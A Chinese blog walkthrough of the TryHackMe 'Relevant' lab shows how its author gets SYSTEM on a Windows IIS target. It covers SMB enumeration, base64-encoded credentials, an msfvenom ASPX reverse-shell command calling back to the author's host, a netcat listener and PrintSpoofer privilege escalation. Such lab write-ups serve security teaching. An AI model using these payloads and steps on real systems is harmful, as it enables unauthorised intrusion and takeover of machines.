TRY HACK ME |RELEVANT「渗透测试挑战」

最新推荐文章于 2023-04-04 20:31:33 发布
最新推荐文章于 2023-04-04 20:31:33 发布
阅读量1.2k 收藏 4
点赞数 4
文章标签: web安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AKAHRZ/article/details/125118932
版权

TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起å进步、一起GET THE FLAG!

开卷开卷

THM靶场:RELEVANT「渗透测试挑战」

您已被分配给一个客户,该客户希望在一个环境中进行渗透测试,该环境将在 7 天内发布到生产环境中。

工作范围:

客户要求工程师对提供的虚拟环境进行评估。客户要求提供有关评估的最少信息,希望从恶意行为者的角度进行参与(黑盒渗透测试)。客户要求您保护两个标志(未提供位置)作为利用证明:

user.txt
root.txt
此外,客户提供了以下范围津贴:

本次活动允许使用任何工具或技术,但我们要求您先尝试手动利用
找到并记录所有发现的漏洞
将发现的标志提交到仪表板
只有分配给您机器的 IP 地址在范围内
查找并报告所有漏洞(是的,root 路径不止一个)

(COSPLAY关闭)

Evil-WinRM
很显然,这是一个模拟真实渗透测试环境的一个房间。介绍里给了测试的范围、还有找出其他漏洞的津贴啥的,但是我们毫不关心,作为一个白帽子黑客(bushi),我们目标就是干碎他的系统,获取user和root权限,很简单,直接开干~

启动机器,连接openvpn,点击“Start Machine”获取目标IP,本次测试使用KAIL作为攻击机,连接成功后显示如下:默认

这是一个IIS的默认页面,看到这个页面,一下子脑子里就涌入了大量的漏洞可以利用的,我们暂时不着急,先把我们的三板斧打完,先来一套NMAP连击:

export IP=10.10.xx.xx //设置靶机IP
nmap -Pn -T5 --max-retries 2500 -sC -sV -oN nmap/initial $IP //扫描开始,将结果保存在nmap/initial中

扫描结果

分析扫描结果,我们不难发现,服务器上开启了SMB服务,我们先进去探索下

smbclient -L \\\\10.10.34.124\\

很幸运,默认无密码,我们直接进来了

SMB
分析下,我们可以看到一个nt4wrksv的用户,可能是管理员配置的失误,我们再访问下这个用户:
nt4wrksv
同样的无密码,我们直接进入。做到这里真是无语了,不吐不快,很多人会说,现实生活中真的有这么傻的人连密码都不设的吗?其实真实情况可能比这个更恐怖,据说某国外军方的后台服务器密码用的都是123456。弱口令早已经成为全球第一大危险漏洞,不管你技术如何,学识如何,也很难填补上人性的漏洞。我们继续分析,看到一个password文件,直接下载下来:
password.txt
学过密码学或者打过相关CTF的应该能很明显的看出来,这两个都是BASE64的加密方式,操作一下解密,也可以在一些网站解密,随你喜欢

用户名密码

所以很简单,我们获取到了BOb和Bill的密码。这里往下我们有两个思路,可以跑一下网站的目录,找找看有没有什么漏洞,或者我们可以直接利用SMB服务上传反向shell来直接G-SHELL。我们选择直接上传shell,这里需要用到一个网站:https://pentest.ws/tools/venom-builder。我们简单设置下
我们设置一下所需要的条件,它会帮我们构造好命令,msfvenom命令已经构造完成,我们直接复制粘贴:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.2.118.230 LPORT=9999 -f aspx -o akahrz.aspx

shell构造完成
msfvenom构造完成后直接上传:

上传文件成功
上传文件成功后,我们直接在URL中访问,注意先nc 一波接受反弹shell:
成功
成功获取了user权限后,正常的思维我们应该是找一波漏洞直接提权,这里我们可以用常规套路使用WINPEAS,可以参考我之前的文章,这里我们不使用WINPEAS,查阅资料后,我们使用PrintSpoofer文件进行提权,下载链接:https://github.com/dievus/printspoofer上传完成
然后我们直接运行文件,轻松获取system权限,游戏结束!
system

RELEVANT 靶场通关小结

在这个房间中,一开始以真实的渗透测试的形式表达出这是一个漏洞很多的网站,但是在测试过程中我们会发现真的很简单,前提是你的思路要正确。就像Joe Helle(国外一个黑客所说),不一定每个BOX都要TRY HARDER,而是要想办法了解更多之前没有理解和发现的知识点。如果有部分不明白的,可以把流程反反复复的多看几遍,同时也非常欢迎大家私信我,如果觉得内容做的不错的话,也可以关注我的公众号:HACKER 航仔 以获取最新消息并与我联系,十分感谢能看到这里的各位,虽然制作不易,看到你们的点赞我还是很开心的!我们下期再见,拜了个拜~~~

拜拜~

AKA航仔
关注
Tryhackme - Retro
冬萍子癸水
05-28 1134
1 扫描 80进网页搜集信息,3389是远程控制端口 可以xfreerdp /u:wade /v:10.10.140.239然后远程控制桌面。但是要知道密码。或者用别的方法登进去。 C:\root> masscan -p1-65535,U:1-65535 10.10.140.239 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-05-28 00:41:40 GMT -- forced optio
2021年软件测试面试题大全
热门推荐
hard_days的博客
11-30 20万+
简述测试流程: 1、阅读相关技术文档(如产品PRD、UI设计、产品流程图等)。 2、参加需求评审会议。 3、根据最终确定的需求文档编写测试计划。 4、编写测试用例(等价类划分法、边界值分析法等)。 5、用例评审(主要参与人员:开发、测试、产品、测试leader)。 6、开发提交代码至SVN或者GIT ,配管搭建测试环境。 7、执行测试用例,记录发现的问题。 8、验证bug与回归测试。 9、编写测试报告。 10、产品上线。 补充测试用例设计过程: 根据需求得出测试需求 设计测试方
TRY HACK ME Hack Park 「Hydra+Winpeas」
AKAHRZ的博客
04-23 3753
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Steel Mountain「利用powershell提权」THM靶场:Steel MountainTASK1 谁是最佳员工?TASK2 获得初始 shellTA.
TryHackMe:Relevant(Windows靶机渗透)
最新发布
Mysmycbx的博客
04-04 379
几个月前出现了一个新的漏洞,叫做Printspoofer,它利用了Windows中的一个漏洞,其中某些服务帐户需要使用SeImpersonate特权以更高的权限运行。使用SMB共享,我们可以将Printspoofer漏洞上传到计算机,导航到C:/inetpub/wwwroot/nt4wrksv目录,并定位它。在80端口没有发现内容,但是在49663端口发现了一个目录,如图。通过扫描服务,发现了web服务80端口和49663端口,smb的445端口和rdp的3389端口。
TryHackerMe Brute It 靶机
z4yn:)的博客
02-05 160
Brute It Learn how to brute, hash cracking and escalate privileges in this box! ##01 信息收集 nmap 扫开放端口,只开放22,80端口 先从80入手,打开是个apache的默认安装页面,查看了源代码也没有发现线索 接着用dirb粗劣的扫一下目录,得到一个/admin的目录 访问了是一个登录页面 查看也源代码发现注释面写到john的用户名为admin ##02 暴...
tryhackme
03-08
tryhackme
chef-relevant-tests:只运行您需要运行的 Chef 测试
06-29
厨师相关测试 “终于,一颗不以与食物有关的东西命名的厨师宝石!” -每个人 你有没有想过,你可能只是一个有点小聪明哪些改变你的食谱厨师测试时运行? 这是给你的宝石! 这是为了解决我们在 Brigade 的问题:我们...
Relevant Search(Manning,2016)
10-08
Relevant Search demystifies relevance work. Using Elasticsearch, it teaches you how to return engaging search results to your users, helping you understand and leverage the internals of Lucene-based ...
Relevant.Search.With.applications.for.Solr.and.Elasticsearch
10-20
Relevant Search demystifies relevance work. Using Elasticsearch, it teaches you how to return engaging search results to your users, helping you understand and leverage the internals of Lucene-based ...
Relevant search with applications for Solr and Elasticsearch
03-10
标题“Relevant search with applications for Solr and Elasticsearch”以及描述“Relevant search with applications for Solr and Elasticsearch”共同强调了本书的核心内容:**相关搜索(Relevant Search)**在*...
TRY HACK ME BLUE 永恒之蓝
AKAHRZ的博客
03-26 2641
永恒之蓝(EternalBlue)是美国国家安全局开发的漏洞利用程序,于2017年4月14日被黑客组织影子掮客泄漏。该工具利用445/TCP端口的文件分享协议的漏洞进行散播。
TRY HACK ME INTERNAL「渗透测试挑战02」
AKAHRZ的博客
06-12 1030
很简单的靶场,有手就行启动机器,连接openvpn,点击“Start Machine”获取目标IP,本次测试使用KAIL作为攻击机,连接成功后显示如下: 可以看到,这是一个apache的默认页面,根据题目的提示,我们需要先将主机添加到 /etc/hosts ,我们先nano 打开,然后将域名internal.thm添加上,我这里在MAC和KALI上都设置了,只显示一个MAC的页面供大家参考 然后,我们使用gobuster来爆破一波目录,命令构造如下: 可以看到扫描结果里,有wordpress页面,所以说
TryHackMe-进攻性渗透测试-08_Relevant
M1n9K1n9的博客
12-24 282
客户要求最小 提供有关评估的信息,希望参与 从恶意行为者的眼睛进行(黑匣子渗透 测试)。getshell翻车了,没事,按照已经做过的题的思路,我们换个shell后缀再尝试一下,asp不行尝试aspx。很好,那么根据一般思路,应该就是要上传个reverse shell然后在web上访问getshell。此外就没别的了,正当我想随便输入个错误路径时,发现没有任何错误页面和回显。此服务中允许使用任何工具或技术,但我们要求您先尝试手动利用。循例 nmap 扫,80的web访问不了,检索smb看看。
Try hack me——永恒之蓝——ms17-010
m_de_g的博客
01-08 5536
Try hack me——永恒之蓝 1.开启靶场 2.开启完成后,可以在右边进行测试,由于平台是外国人开发的,可以借助翻译软件进行翻译(如:有道词典) 一、Recon模块 1.根据提示回答问题,使用nmap扫描 2.我们直接使用nmap对靶机进行扫描 nmap -A -v 10.10.240.121 3.通过扫描,可以知道目标靶机,开放了135,139,445,3389,49152,49153,49154,49158,49160等多个端口 4.可以回答第二个问题 How many ports
TryHackMe-Gatekeeper
网安星空
12-28 912
TryHackMe靶场,缓冲区溢出,使用Immunity进行溢出测试,
TryHackMe-Wreath [网络杀伤链](windows网络渗透测试
M1n9K1n9的博客
02-19 2063
了解如何通过破坏面向公众的 Web 计算机并通过隧道传输流量以访问 Wreath 网络中的其他计算机来透视网络
tryhackme--Blog
qq_45414878的博客
11-15 375
tryhackme–Tony the Tiger
Tryhackme - Blue (考点:blue MS17-010)
冬萍子癸水
05-25 890
1 扫描 看名字就知道应该是blue漏洞 PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (wo
TRY HACK ME Alfred「利用Jenkins配置错误提权」
AKAHRZ的博客
04-16 461
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Alfred「利用Jenkins配置错误提权」THM靶场:AlfredTASK1 谁是最佳员工?TASK2 获得初始 shellTASK3 权限提升TASK4 不.
Google ACC:快速建模法提升软件测试效率
由于Google项目的开发人员与测试人员比例较高,自动化测试和系统级测试成为常态,但测试人员仍面临覆盖所有用户行为的挑战。 通过ACC建模,测试人员可以集中精力在那些最具影响力且代表用户价值的特性上进行测试,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值